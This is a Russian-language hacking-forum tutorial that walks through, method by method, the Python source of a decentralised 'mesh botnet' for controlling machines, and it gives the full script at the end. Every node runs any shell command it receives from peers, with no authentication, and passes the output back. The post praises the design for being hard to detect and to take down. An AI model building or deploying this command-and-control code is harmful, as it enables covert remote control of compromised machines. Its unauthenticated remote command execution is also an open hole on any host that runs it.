Своя управляющая Mesh сеть с нуля (PoC)

D2

Администратор
Регистрация
19 Фев 2025
Сообщения
4,380
Реакции
0
Привет, форумчане!
Сегодня я расскажу вам, как замутить свою собственную Mesh сеть для контроля машин - прямую такую штуку с PoC кодом, чтобы вы могли сами покрутить и понять, как это работает.
Это обучающая статья для форума xss.is - всё поэтапно, с теорией, объяснением, почему мы делаем так, а не иначе.

Введение в Mesh сети - что это вообще такое?​

Для начала давайте разберёмся, что такое Mesh сеть. В обычных сетях - типа клиент-сервер - есть главный узел (сервер), который рулит всеми клиентами. Если его вырубить, вся схема разваливается. Mesh сеть - это другой уровень: тут все узлы равноправны, как в коммуне. Каждый может общаться с каждым напрямую или через соседей - получается такая паутина, где каждый узел и клиент, и сервер одновременно.

Почему Mesh сети - это тема?​

  • Отказоустойчивость - если одна нода отвалилась, сеть не падает, сообщения идут через другие узлы.
  • Сложность обнаружения - нет центральной точки, которую можно легко вычислить и прихлопнуть.
  • Масштабируемость - добавляйте сколько угодно узлов, сеть сама разберётся.
Мы будем строить Mesh сеть для контроля машин. Но не классическую, с C&C (Command & Control) сервером, а децентрализованную - команды будут передаваться от узла к узлу, как эстафета.
В статье мы пишем PoC, так что всё максимально просто, но рабочая база у вас будет.

Теория - как это работает?​

Наша Mesh сеть - это набор узлов (нод), которые:
  • Слушают входящие подключения.
  • Коннектятся к другим узлам.
  • Пересылают сообщения (команды, ответы) по сети.

Ключевые элементы:​

  1. Узел (MeshNode) - знает свой хост и порт, имеет список начальных пиров, к которым цепляется при старте.
  2. Сообщения - JSON с полями: id (уникальный идентификатор), type (тип: handshake, command, response), sender (отправитель), target (получатель, если есть), path (маршрут), content (содержимое).
  3. Handshake - при подключении ноды обмениваются инфой: "Привет, я такой-то, мой порт вот этот".
  4. Команды и ответы - админская нода шлёт команды (например, "hostname"), они расходятся по сети, узлы выполняют и возвращают результат.

Как сообщения ходят?​

  • Нода получает сообщение - проверяет его id. Если уже видела, дропает.
  • Если новое - обрабатывает (например, выполняет команду) и шлёт всем своим пирам, кроме отправителя.
  • Получается волновой эффект - сообщение разлетается по всей сети.

Как избежать зацикливания?​

  • У каждой ноды есть message_history - хранит id уже обработанных сообщений.
  • Плюс forwarded_messages - чтобы не пересылать одно и то же по кругу.
1740598214595.png


Пишем код​

Теперь давайте замутим код. Я разберу каждый метод класса MeshNode - зачем он нужен, как работает, почему написан именно так. Начнём с базовых функций для отправки и получения сообщений, а потом перейдём к самому классу.

Базовые функции для общения​

encode_message(message)

  • Зачем нужен: Подготавливает сообщение перед отправкой - добавляет поле size (размер данных в байтах) и сериализует в JSON.
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def encode_message(message):
        temp = message.copy()
        if "size" in temp:
            del temp["size"]
        message_str = json.dumps(temp)
        size = len(message_str.encode('utf-8'))
        message["size"] = size
        return json.dumps(message).encode('utf-8')
  • Почему так:
    • Делаем копию словаря message, чтобы не портить оригинал.
    • Удаляем size, если оно есть - оно нам не нужно для вычисления размера, добавим потом.
    • Сериализуем в строку через json.dumps(), считаем байты через encode('utf-8').
    • Добавляем size в оригинальный словарь и сериализуем ещё раз - теперь это готовые байты для отправки.
  • Детали: Это нужно, чтобы получатель знал, сколько байт читать. Без size он бы просто гадал, где конец сообщения.

send_message(sock, message)

  • Зачем нужен: Отправляет сообщение через сокет - сначала 4 байта длины, потом само сообщение.
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def send_message(sock, message):
        try:
            data = encode_message(message)
            length_prefix = struct.pack('!I', len(data))
            sock.sendall(length_prefix + data)
        except Exception as e:
            logging.error("send_message:: Error: %s", e)
  • Почему так:
    • encode_message() даёт нам байты сообщения.
    • struct.pack('!I', len(data)) упаковывает длину в 4 байта (unsigned int, big-endian - ! для сетевого порядка).
    • sendall() гарантирует, что все байты уйдут, даже если сеть тормозит.
    • Оборачиваем в try-except - если сокет отвалился, логируем ошибку и не падаем.
  • Детали: Префикс длины - стандартный способ в сетевом программировании. Без него получатель не поймёт, где начало и конец.

recvall(sock, n)

  • Зачем нужен: Читает ровно n байт из сокета - нужно для получения и длины, и самого сообщения.
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def recvall(sock, n):
        data = b''
        while len(data) < n:
            try:
                packet = sock.recv(n - len(data))
            except Exception as e:
                logging.error("recvall:: Error read from socket: %s", e)
                return None
            if not packet:
                return None
            data += packet
        return data
  • Почему так:
    • sock.recv() может вернуть меньше байт, чем запрошено, - сеть же не резиновая.
    • Цикл while читает, пока не наберём нужное количество.
    • Если соединение рвётся (packet пустой) или ошибка - возвращаем None.
  • Детали: Без этого метода мы бы теряли куски данных - recv() не гарантирует полный объём за один вызов.

recv_message(sock)

  • Зачем нужен: Читает полное сообщение - сначала длину, потом данные, и декодирует из JSON.
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def recv_message(sock):
        raw_length = recvall(sock, 4)
        if not raw_length:
            return None
        length = struct.unpack('!I', raw_length)[0]
        data = recvall(sock, length)
        if not data:
            return None
        try:
            message_str = data.decode('utf-8')
            message = json.loads(message_str)
            return message
        except Exception as e:
            logging.error("recv_message:: Error decoding message: %s", e)
            return None
  • Почему так:
    • Сначала читаем 4 байта длины через recvall() - это наш префикс.
    • Распаковываем через struct.unpack('!I') - получаем число.
    • Читаем ровно length байт - это само сообщение.
    • Декодируем из байтов в строку (utf-8), парсим JSON - готово.
    • Если что-то пошло не так (сокет отвалился, JSON кривой) - возвращаем None.
  • Детали: Это обратная сторона send_message() - читаем в том же формате, как отправили.

Класс MeshNode - сердце сети​

Теперь к главному, класс MeshNode. Это основа нашей сети. Разберём каждый его метод до винтиков.

init(self, host, port, is_admin, initial_peers)

  • Зачем нужен: Инициализирует ноду - задаёт базовые параметры и структуры данных.
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def __init__(self, host, port, is_admin, initial_peers):
        self.host = host
        self.port = port
        self.is_admin = is_admin
        self.node_id = f"{host}:{port}"
        self.initial_peers = initial_peers
        self.peers = []
        self.peers_lock = threading.Lock()
        self.message_history = set()
        self.forwarded_messages = set()
        self.running = True
  • Почему так:
    • host и port - где нода слушает входящие соединения.
    • is_admin - флаг, админская нода или нет (админ шлёт команды).
    • node_id - простое строковое ID из хоста и порта, для PoC хватает.
    • initial_peers - список строк "host:port" для начальных подключений.
    • peers - список активных сокетов, через которые общаемся.
    • peers_lock - лок для потокобезопасности, чтобы не было гонок при добавлении/удалении пиров.
    • message_history и forwarded_messages - множества для фильтрации дубликатов сообщений.
    • running - флаг для graceful завершения.
  • Детали: Всё минималистично - для PoC не нужны сложные структуры, но основа для масштабирования есть.

start(self)

  • Зачем нужен: Запускает ноду - сервер, подключения к пирам, админский цикл (если надо).
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def start(self):
        server_thread = threading.Thread(target=self.server_loop)
        server_thread.daemon = True
        server_thread.start()
        logging.info("start:: Server on %s:%s", self.host, self.port)
        for peer in self.initial_peers:
            try:
                peer_host, peer_port = peer.split(":")
                peer_port = int(peer_port)
                t = threading.Thread(target=self.connect_to_peer, args=(peer_host, peer_port))
                t.daemon = True
                t.start()
            except Exception as e:
                logging.error("start:: Unknown peer format %s: %s", peer, e)
        if self.is_admin:
            admin_thread = threading.Thread(target=self.admin_send_commands)
            admin_thread.daemon = True
            admin_thread.start()
        try:
            while self.running:
                time.sleep(1)
        except KeyboardInterrupt:
            logging.info("start:: Stop")
            self.running = False
            sys.exit(0)
  • Почему так:
    • Запускаем сервер в потоке через server_loop() - он будет ловить входящие соединения.
    • daemon = True - чтобы потоки гасились при закрытии программы.
    • Проходим по initial_peers, парсим "host:port", запускаем подключение в потоке.
    • Если нода админская - стартуем цикл отправки команд.
    • Основной цикл while - просто держит программу живой, пока не нажмём Ctrl+C.
    • При прерывании ставим running = False и выходим чисто.
  • Детали: Это точка входа - отсюда нода оживает и начинает строить сеть.

server_loop(self)

  • Зачем нужен: Слушает входящие подключения - это серверная часть ноды.
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def server_loop(self):
        server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            server_socket.bind((self.host, self.port))
            server_socket.listen(5)
        except Exception as e:
            logging.error("server_loop:: Error on socket bind: %s", e)
            sys.exit(1)
        while self.running:
            try:
                conn, addr = server_socket.accept()
                logging.info("server_loop:: recv conn from %s", addr)
                handshake_msg = {
                    "id": str(uuid.uuid4()),
                    "type": "handshake",
                    "content": {"port": self.port, "node_id": self.node_id},
                    "sender": self.node_id,
                    "target": "",
                    "path": [self.node_id]
                }
                send_message(conn, handshake_msg)
                with self.peers_lock:
                    self.peers.append(conn)
                t = threading.Thread(target=self.handle_connection, args=(conn, addr))
                t.daemon = True
                t.start()
            except Exception as e:
                logging.error("server_loop:: Error recv conn: %s", e)
  • Почему так:
    • Создаём TCP сокет - AF_INET для IPv4, SOCK_STREAM для надёжного соединения.
    • bind() и listen(5) - привязываем к хосту и порту, очередь на 5 подключений.
    • Если бинд не удался (порт занят, например) - падаем с ошибкой.
    • В цикле accept() ловит входящие соединения - возвращает сокет conn и адрес клиента.
    • Сразу шлём handshake_msg - представляемся новому пиру.
    • Добавляем conn в peers (с локером!) и запускаем обработку в потоке.
  • Детали: Это делает ноду доступной для других - без этого она бы только коннектилась, но не принимала.

connect_to_peer(self, peer_host, peer_port)

  • Зачем нужен: Устанавливает исходящее соединение к другому узлу.
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def connect_to_peer(self, peer_host, peer_port):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((peer_host, peer_port))
            logging.info("connect_to_peer:: with %s:%s", peer_host, peer_port)
            handshake_msg = {
                "id": str(uuid.uuid4()),
                "type": "handshake",
                "content": {"port": self.port, "node_id": self.node_id},
                "sender": self.node_id,
                "target": "",
                "path": [self.node_id]
            }
            send_message(sock, handshake_msg)
            with self.peers_lock:
                self.peers.append(sock)
            t = threading.Thread(target=self.handle_connection, args=(sock, (peer_host, peer_port)))
            t.daemon = True
            t.start()
        except Exception as e:
            logging.error("connect_to_peer:: err conn to peer %s:%s - %s", peer_host, peer_port, e)
  • Почему так:
    • Создаём сокет и коннектимся к peer_host:peer_port.
    • Если всё ок - шлём handshake_msg, чтобы пир знал, кто мы.
    • Добавляем сокет в peers и запускаем обработку в потоке.
    • Если пир не отвечает - логируем ошибку и идём дальше.
  • Детали: Это исходящая часть - без неё нода не сможет строить сеть активно.

handle_connection(self, conn, addr)

  • Зачем нужен: Обрабатывает конкретное соединение - читает сообщения, пока пир жив.
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def handle_connection(self, conn, addr):
        while self.running:
            message = recv_message(conn)
            if message is None:
                logging.info("handle_connection:: connection with %s closed", addr)
                break
            self.handle_message(message, conn)
        with self.peers_lock:
            if conn in self.peers:
                self.peers.remove(conn)
        conn.close()
  • Почему так:
    • В цикле читаем сообщения через recv_message().
    • Если None - соединение оборвалось, выходим из цикла.
    • Каждое сообщение кидаем в handle_message() для обработки.
    • При выходе убираем сокет из peers и закрываем его.
  • Детали: Это связующее звено между сокетом и логикой обработки - без него сообщения бы не доходили до ноды.

handle_message(self, message, conn)

  • Зачем нужен: Решает, что делать с полученным сообщением - главный мозг ноды.
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def handle_message(self, message, conn):
        msg_id = message.get("id")
        if msg_id in self.message_history:
            return
        self.message_history.add(msg_id)
        path = message.get("path", [])
        if self.node_id not in path:
            path.append(self.node_id)
            message["path"] = path
        logging.info("handle_message:: recv msg %s (type: %s, path: %s)", msg_id, message.get("type"), message.get("path"))
        msg_type = message.get("type")
        if msg_type == "handshake":
            content = message.get("content", {})
            peer_node_id = content.get("node_id")
            peer_port = content.get("port")
            logging.info("handle_message:: Handshake from %s, port: %s", peer_node_id, peer_port)
        elif msg_type == "command":
            target = message.get("target", "")
            if target == "" or target == self.node_id:
                cmd = message.get("content")
                logging.info("handle_message:: run cmd '%s'", cmd)
                t = threading.Thread(target=self.execute_command, args=(cmd, msg_id, message.get("sender")))
                t.daemon = True
                t.start()
        elif msg_type == "response":
            logging.info("handle_message:: receive command output %s: %s", message.get("content", {}).get("command_id"), message.get("content", {}).get("result"))
        if msg_id not in self.forwarded_messages:
            self.forwarded_messages.add(msg_id)
            self.forward_message(message, exclude_conn=conn)
  • Почему так:
    • Проверяем msg_id - если уже видели, дропаем, чтобы не зациклить.
    • Добавляем себя в path - для отладки и отслеживания маршрута.
    • Смотрим тип сообщения:
      • Handshake - логируем инфу о пире.
      • Command - если для нас или broadcast (target пустой), запускаем команду в потоке.
      • Response - просто логируем результат.
    • Если сообщение не пересылали - добавляем в forwarded_messages и шлём дальше.
  • Детали: Это ядро логики - тут нода решает, что делать и куда слать.

forward_message(self, message, exclude_conn=None)

  • Зачем нужен: Пересылает сообщение всем пирам, кроме отправителя.
  • Как пишется:
    Код: Скопировать в буфер обмена
    Код:
    def forward_message(self, message, exclude_conn=None):
        with self.peers_lock:
            for peer in list(self.peers):
                if peer == exclude_conn:
                    continue
                try:
                    send_message(peer, message)
                    logging.info("forward_message:: forward msg %s", message.get("id"))
                except Exception as e:
                    logging.error("forward_message:: err forward: %s", e)
                    self.peers.remove(peer)
                    peer.close()
  • Почему так:
    • Лочим peers, чтобы не было гонок.
    • Проходим по копии списка (list(self.peers)), шлём всем, кроме exclude_conn.
    • Если отправка фейлится - убираем пир и закрываем сокет.
  • Детали: Это делает сеть "живой" - без пересылки сообщения бы не расходились.

execute_command(self, cmd, original_msg_id, original_sender)

  • Зачем нужен: Выполняет команду и отправляет ответ.
  • Как пишется:
    Код: Скопировать в буфер обмена
    Код:
    def execute_command(self, cmd, original_msg_id, original_sender):
        logging.info("execute_command:: run '%s'", cmd)
        cmd_timeout = 5
        try:
            result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=cmd_timeout)
            if result.stdout:
                output = result.stdout.decode('utf-8').strip()
            else:
                output = result.stderr.decode('utf-8').strip()
        except subprocess.TimeoutExpired:
            output = f"cmd timeout ({cmd_timeout})"
        except Exception as e:
            output = f"err cmd execute: {e}"
        response_msg = {
            "id": str(uuid.uuid4()),
            "type": "response",
            "content": {"command_id": original_msg_id, "result": output},
            "sender": self.node_id,
            "target": original_sender,
            "path": [self.node_id]
        }
        self.forward_message(response_msg)
        logging.info("execute_command:: send cmd response %s", original_msg_id)
  • Почему так:
    • Выполняем команду через subprocess.run() с таймаутом 5 сек.
    • Берём вывод - stdout или stderr, если что-то пошло не так.
    • Формируем ответ с привязкой к original_msg_id и шлём отправителю.
  • Детали: Это делает ноду "полезной" - без выполнения команд это был бы просто чат.

admin_send_commands(self)

  • Зачем нужен: Админская нода периодически шлёт команды всем.
  • Как пишется:
    Python: Скопировать в буфер обмена
    Код:
    def admin_send_commands(self):
        while self.running:
            time.sleep(15)
            command_msg = {
                "id": str(uuid.uuid4()),
                "type": "command",
                "content": "hostname",
                "sender": self.node_id,
                "target": "",
                "path": [self.node_id]
            }
            logging.info("admin_send_commands:: send cmd 'hostname'")
            self.forward_message(command_msg)
  • Почему так:
    • Каждые 15 сек шлём "hostname" как broadcast (target пустой).
    • Новый id каждый раз - чтобы не фильтровались как дубли.
    • Команда hostname используется для теста. Можете использовать другую.
  • Детали: Это тестовая фича - показывает, как админ управляет сетью.

Как это работает?​

Запуск​

  • Нода стартует сервер, цепляется к пирам, обменивается handshake.
  • Админ (если есть) начинает слать команды.

Распространение​

  • Команды и ответы ходят волной - от узла к узлу.
  • Фильтрация дубликатов спасает от зацикливания.

Пример​

Запускаем три ноды:
Bash: Скопировать в буфер обмена
Код:
python3 mesh.py --host 192.168.1.10 --port 5000 --admin --peers 192.168.1.11:5000
python3 mesh.py --host 192.168.1.11 --port 5000 --peers 192.168.1.10:5000 192.168.1.12:5000
python3 mesh.py --host 192.168.1.12 --port 5000 --peers 192.168.1.11:5000
  • A (админ) шлёт "hostname" → B → C.
  • C отвечает → B → A.

Итог​

Вот и всё!
Я с вами разобрал Mesh сеть от А до Я - от теории до каждого метода. Полный код ниже, крутите, тестите.
Что добавить? Шифрование, маршрутизацию, устойчивость к сбоям, подпись команд для администратора сети, и многое другое.
Удачи в экспериментах! Вопросы есть - пишите, разберёмся.

Материал предоставлен исключительно в ознакомительных и образовательных целях. Автор не несёт ответственности за использование информации в нарушение законов вашей страны. Все действия с кодом вы выполняете на свой страх и риск - думайте головой и уважайте правила

Автор keklick1337
Специально для xss.is
Спойлер: Полный код
Python: Скопировать в буфер обмена
Код:
#!/usr/bin/env python3
import socket
import threading
import argparse
import logging
import json
import uuid
import time
import subprocess
import struct
import sys

def encode_message(message):
    """
    Подготавливает сообщение: вычисляет размер (без учета поля size) и добавляет его в сообщение,
    затем сериализует в JSON и возвращает байты.
    """
    temp = message.copy()
    if "size" in temp:
        del temp["size"] # size не нужен, его потом посчитаем
    message_str = json.dumps(temp)
    size = len(message_str.encode('utf-8'))
    message["size"] = size
    return json.dumps(message).encode('utf-8')

def send_message(sock, message):
    """
    Отправляет сообщение по сокету:
    сначала 4 байта с длиной, затем JSON-сообщение.
    """
    try:
        data = encode_message(message)
        length_prefix = struct.pack('!I', len(data))
        sock.sendall(length_prefix + data)
    except Exception as e:
        logging.error("send_message:: Error: %s", e)

def recvall(sock, n):
    """
    Читает ровно n байт из сокета.
    """
    data = b''
    while len(data) < n:
        try:
            packet = sock.recv(n - len(data))
        except Exception as e:
            logging.error("recvall:: Error read from socket: %s", e)
            return None
        if not packet:
            return None
        data += packet
    return data

def recv_message(sock):
    """
    Читает сообщение: сначала 4 байта с длиной, затем само сообщение.
    """
    raw_length = recvall(sock, 4)
    if not raw_length:
        return None
    length = struct.unpack('!I', raw_length)[0]
    data = recvall(sock, length)
    if not data:
        return None
    try:
        message_str = data.decode('utf-8')
        message = json.loads(message_str)
        return message
    except Exception as e:
        logging.error("recv_message:: Error decoding message: %s", e)
        return None

class MeshNode: # наш основной класс mesh сети
    def __init__(self, host, port, is_admin, initial_peers):
        self.host = host
        self.port = port
        self.is_admin = is_admin
        self.node_id = f"{host}:{port}" # id ноды считаю максимально просто для данного PoC
        self.initial_peers = initial_peers  # список строк вида "host:port"
        self.peers = []  # список активных сокетов
        self.peers_lock = threading.Lock()

        # Наборы для предотвращения дублирования/зацикливания сообщений
        # p.s. у них можно TTL какой нибудь выставить потом
        self.message_history = set()
        self.forwarded_messages = set()

        # Чтобы корректно завершить всё и отрубить ноду
        self.running = True

    def start(self):
        # Запускаем сервер для входящих соединений
        server_thread = threading.Thread(target=self.server_loop)
        server_thread.daemon = True
        server_thread.start()
        logging.info("start:: Server on %s:%s", self.host, self.port)

        # Пытаемся установить исходящие соединения к начальным пирами
        for peer in self.initial_peers:
            try:
                peer_host, peer_port = peer.split(":")
                peer_port = int(peer_port)
                t = threading.Thread(target=self.connect_to_peer, args=(peer_host, peer_port))
                t.daemon = True
                t.start()
            except Exception as e:
                logging.error("start:: Unknown peer format %s: %s", peer, e)

        # Если узел является администратором, запускаем периодическую отправку команды
        if self.is_admin:
            admin_thread = threading.Thread(target=self.admin_send_commands)
            admin_thread.daemon = True
            admin_thread.start()

        # Основной цикл ожидания (можно добавить обработку сигналов для корректного завершения)
        try:
            while self.running:
                time.sleep(1)
        except KeyboardInterrupt:
            logging.info("start:: Stop")
            self.running = False
            sys.exit(0)

    def server_loop(self):
        server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            server_socket.bind((self.host, self.port))
            server_socket.listen(5)
        except Exception as e:
            logging.error("server_loop:: Error on socket bind: %s", e)
            sys.exit(1)
        while self.running:
            try:
                conn, addr = server_socket.accept()
                logging.info("server_loop:: recv conn from %s", addr)
                # При установке входящего соединения сразу отправляем handshake с информацией о порте и node_id
                handshake_msg = {
                    "id": str(uuid.uuid4()),
                    "type": "handshake",
                    "content": {"port": self.port, "node_id": self.node_id},
                    "sender": self.node_id,
                    "target": "",
                    "path": [self.node_id]
                }
                send_message(conn, handshake_msg)
                with self.peers_lock:
                    self.peers.append(conn)
                t = threading.Thread(target=self.handle_connection, args=(conn, addr))
                t.daemon = True
                t.start()
            except Exception as e:
                logging.error("server_loop:: Error recv conn: %s", e)

    def connect_to_peer(self, peer_host, peer_port):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((peer_host, peer_port))
            logging.info("connect_to_peer:: with %s:%s", peer_host, peer_port)
            # После подключения отправляем handshake с информацией о себе
            handshake_msg = {
                "id": str(uuid.uuid4()),
                "type": "handshake",
                "content": {"port": self.port, "node_id": self.node_id},
                "sender": self.node_id,
                "target": "",
                "path": [self.node_id]
            }
            send_message(sock, handshake_msg)
            with self.peers_lock:
                self.peers.append(sock)
            # Запускаем цикл чтения сообщений из этого соединения
            t = threading.Thread(target=self.handle_connection, args=(sock, (peer_host, peer_port)))
            t.daemon = True
            t.start()
        except Exception as e:
            logging.error("connect_to_peer:: err conn to peer %s:%s - %s", peer_host, peer_port, e)

    def handle_connection(self, conn, addr):
        while self.running:
            message = recv_message(conn)
            if message is None:
                logging.info("handle_connection:: connection with %s closed", addr)
                break
            self.handle_message(message, conn)
        with self.peers_lock:
            if conn in self.peers:
                self.peers.remove(conn)
        conn.close()

    def handle_message(self, message, conn):
        msg_id = message.get("id")
        # Если сообщение уже было получено, игнорируем его
        if msg_id in self.message_history:
            return
        self.message_history.add(msg_id)
        # Обновляем поле path: добавляем свой ID, если его там нет
        path = message.get("path", [])
        if self.node_id not in path:
            path.append(self.node_id)
            message["path"] = path
        logging.info("handle_message:: recv msg %s (type: %s, path: %s)", msg_id, message.get("type"), message.get("path"))

        msg_type = message.get("type")
        if msg_type == "handshake":
            # Можно обработать информацию о пире (например, добавить новый адрес для установления обратного соединения)
            content = message.get("content", {})
            peer_node_id = content.get("node_id")
            peer_port = content.get("port")
            logging.info("handle_message:: Handshake from %s, port: %s", peer_node_id, peer_port)
            # Здесь можно реализовать динамическое добавление новых пирoв, если их ещё нет в списке
        elif msg_type == "command":
            # Если команда адресована узлу (или это broadcast)
            target = message.get("target", "")
            if target == "" or target == self.node_id:
                cmd = message.get("content")
                logging.info("handle_message:: run cmd '%s'", cmd)
                t = threading.Thread(target=self.execute_command, args=(cmd, msg_id, message.get("sender")))
                t.daemon = True
                t.start()
        elif msg_type == "response":
            # Логирование полученного ответа; можно добавить фильтрацию по target
            logging.info("handle_message:: receive command output %s: %s", message.get("content", {}).get("command_id"), message.get("content", {}).get("result"))
        # Пересылаем сообщение дальше, если ранее не пересылали
        if msg_id not in self.forwarded_messages:
            self.forwarded_messages.add(msg_id)
            self.forward_message(message, exclude_conn=conn)

    def forward_message(self, message, exclude_conn=None):
        with self.peers_lock:
            for peer in list(self.peers):
                # Если соединение совпадает с тем, откуда получили сообщение – пропускаем (чтобы не отправлять обратно)
                if peer == exclude_conn:
                    continue
                try:
                    send_message(peer, message)
                    logging.info("forward_message:: formward msg %s", message.get("id"))
                except Exception as e:
                    logging.error("forward_message:: err forward: %s", e)
                    self.peers.remove(peer)
                    peer.close()

    def execute_command(self, cmd, original_msg_id, original_sender):
        logging.info("execute_command:: run '%s'", cmd)
        cmd_tiemout = 5
        try:
            result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=cmd_tiemout)
            if result.stdout:
                output = result.stdout.decode('utf-8').strip()
            else:
                output = result.stderr.decode('utf-8').strip()
        except subprocess.TimeoutExpired:
            output = f"cmd timeout ({cmd_tiemout})"
        except Exception as e:
            output = f"err cmd execute: {e}"
        # Формируем сообщение-ответ
        response_msg = {
            "id": str(uuid.uuid4()),
            "type": "response",
            "content": {"command_id": original_msg_id, "result": output},
            "sender": self.node_id,
            "target": original_sender,  # адресуем отправителю исходной команды
            "path": [self.node_id]
        }
        # Отправляем ответ (пересылаем его по сети)
        self.forward_message(response_msg)
        logging.info("execute_command:: send cmd response %s", original_msg_id)

    def admin_send_commands(self):
        """
        Если узел является администратором, каждые 15 секунд отправляется команда "hostname".
        """
        while self.running:
            time.sleep(15)
            command_msg = {
                "id": str(uuid.uuid4()),
                "type": "command",
                "content": "hostname",
                "sender": self.node_id,
                "target": "",  # пустое target означает broadcast, то есть шлём всем
                "path": [self.node_id]
            }
            logging.info("admin_send_commands:: send cmd 'hostname'")
            self.forward_message(command_msg)

def parse_arguments():
    parser = argparse.ArgumentParser(description="Simple mesh botnet PoC")
    parser.add_argument("--host", required=True, help="listen host")
    parser.add_argument("--port", type=int, required=True, help="listen port")
    parser.add_argument("--admin", action="store_true", help="set admin mode (send's hostname cmd)")
    parser.add_argument("--peers", nargs='*', default=[], help="start peers to connect host:port")
    return parser.parse_args()

def main():
    args = parse_arguments()
    # Настройка логирования с выводом времени
    logging.basicConfig(
        level=logging.INFO,
        format="%(asctime)s [%(levelname)s] %(message)s",
        datefmt="%H:%M:%S"
    )
    node = MeshNode(args.host, args.port, args.admin, args.peers)
    node.start()

if __name__ == "__main__":
    main()
 
Сверху Снизу